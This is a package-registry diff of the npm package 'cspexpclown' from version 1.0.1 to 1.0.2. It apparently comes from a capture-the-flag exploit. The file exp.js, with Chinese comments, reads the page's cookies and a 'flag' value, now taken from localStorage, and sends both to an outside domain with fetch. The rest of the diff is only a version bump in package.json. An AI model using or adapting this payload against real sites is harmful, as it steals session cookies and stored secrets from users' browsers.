cspexpclown 1.0.1 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/exp.js +1 -1
  2. package/package.json +1 -1
package/exp.js CHANGED
@@ -6,7 +6,7 @@
6
6
  const cookies = document.cookie;
7
7
 
8
8
  // 获取全局变量 flag
9
- const flag = window.flag;
9
+ const flag = localStorage.getItem('flag'); //因为从localStorage来set的,所以要这样获取
10
10
 
11
11
  // 发送GET请求并带上Cookie和flag
12
12
  const res = await fetch(`${domain}`, {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "cspexpclown",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "csp",
5
5
  "main": "index.js",
6
6
  "scripts": {